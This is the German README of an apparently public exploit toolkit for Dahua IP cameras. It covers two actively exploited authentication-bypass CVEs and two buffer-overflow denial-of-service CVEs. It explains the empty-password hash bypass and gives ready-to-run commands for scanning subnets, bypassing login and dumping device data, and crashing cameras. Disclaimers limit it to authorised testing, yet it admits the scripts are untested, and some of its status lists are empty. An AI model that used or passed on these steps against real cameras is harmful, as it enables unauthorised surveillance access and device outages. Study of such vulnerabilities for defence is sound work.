
Dahua IP-Kamera CVE-Forschungstoolkit (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ IN ENTWICKLUNG — Diese Skripte basieren auf veröffentlichten CVE-Details und erfordern weitere Tests an verwundbaren Geräten, um die vollständige Funktionalität zu bestätigen.
Forschung und Proof-of-Concept-Skripte für vier kritische Schwachstellen in Dahua IP-Kameras.
DIESE SOFTWARE WIRD NUR ZU BILDUNGSZWECKEN UND FÜR AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.
Durch die Nutzung dieser Tools stimmen Sie zu:
1. Sie haben eine AUSDRÜCKLICHE SCHRIFTLICHE GENEHMIGUNG, die Zielsysteme zu testen.
2. Sie werden diese Tools NICHT für illegale Aktivitäten verwenden.
3. Sie übernehmen die volle Verantwortung für Ihre Handlungen.
4. Die Autoren haften NICHT für Missbrauch oder Schäden.
Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen eine STRAFTAT.
| CVE | CVSS | Typ | Status |
|---|---|---|---|
| CVE-2021-33044 | 9.8 KRITISCH | Authentifizierungsumgehung | CISA KEV (aktiv ausgenutzt) |
| CVE-2021-33045 | 9.8 KRITISCH | Authentifizierungsumgehung | CISA KEV (aktiv ausgenutzt) |
| CVE-2025-31700 | 8.1 HOCH | Buffer Overflow DoS | Neu (2025) |
| CVE-2025-31701 | 8.1 HOCH | Buffer Overflow DoS | Neu (2025) |
Dahua-Kameras verwenden Challenge-Response-Authentifizierung über /RPC2_Login:
Normaler Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Umgehung (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← LEERES Passwort
step2 = MD5("step1:random:step1")
Die anfällige Firmware akzeptiert den leeren Passwort-Hash und gibt ein gültiges Sitzungstoken zurück.
# Repository klonen
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Abhängigkeiten installieren
pip install requests
# Subnetz scannen (Ports erforderlich)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Einzelner Host mit Port
python dahua_scanner.py 192.168.1.100:8081
# Alle Optionen
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Hilfe anzeigen
python dahua_scanner.py --help
Häufige Dahua-Ports: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Einzelnes CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Geräteinformationen nach Umgehung ausgeben
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # Nur HTTP
python dahua_rce.py 192.168.1.100 --cve tcp # Nur TCP/37777
⚠️ WARNUNG: Das DoS-Skript kann das Zielgerät zum Absturz bringen.
requests
Alle anderen Importe stammen aus der Python-Standardbibliothek:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 IN AKTIVER ENTWICKLUNG
Diese Skripte wurden basierend auf Folgendem entwickelt:
Teststatus:
Wenn Sie Zugang zu verwundbaren Geräten für Tests haben, sind Beiträge und Feedback willkommen.
Bitte melden Sie alle Probleme oder Fehlalarme.
MIT-Lizenz – Siehe LICENSE-Datei.
Umair Aziz
GitHub: @umair-aziz025
Nur für Bildungszwecke und autorisierte Sicherheitsforschung.
| Datei | Zweck | CVEs |
|---|
dahua_scanner.py | Netzwerkerkennung — Dahua-Kameras im Subnetz finden | Erkennung |
dahua_exploit.py | Multi-CVE-Scanner — alle Schwachstellen testen | Alle |
dahua_auth_bypass.py | Dedizierte Authentifizierungsumgehung mit --dump-Option | CVE-2021-33044/45 |
dahua_rce.py | Buffer-Overflow-DoS-Sonde | CVE-2025-31700/01 |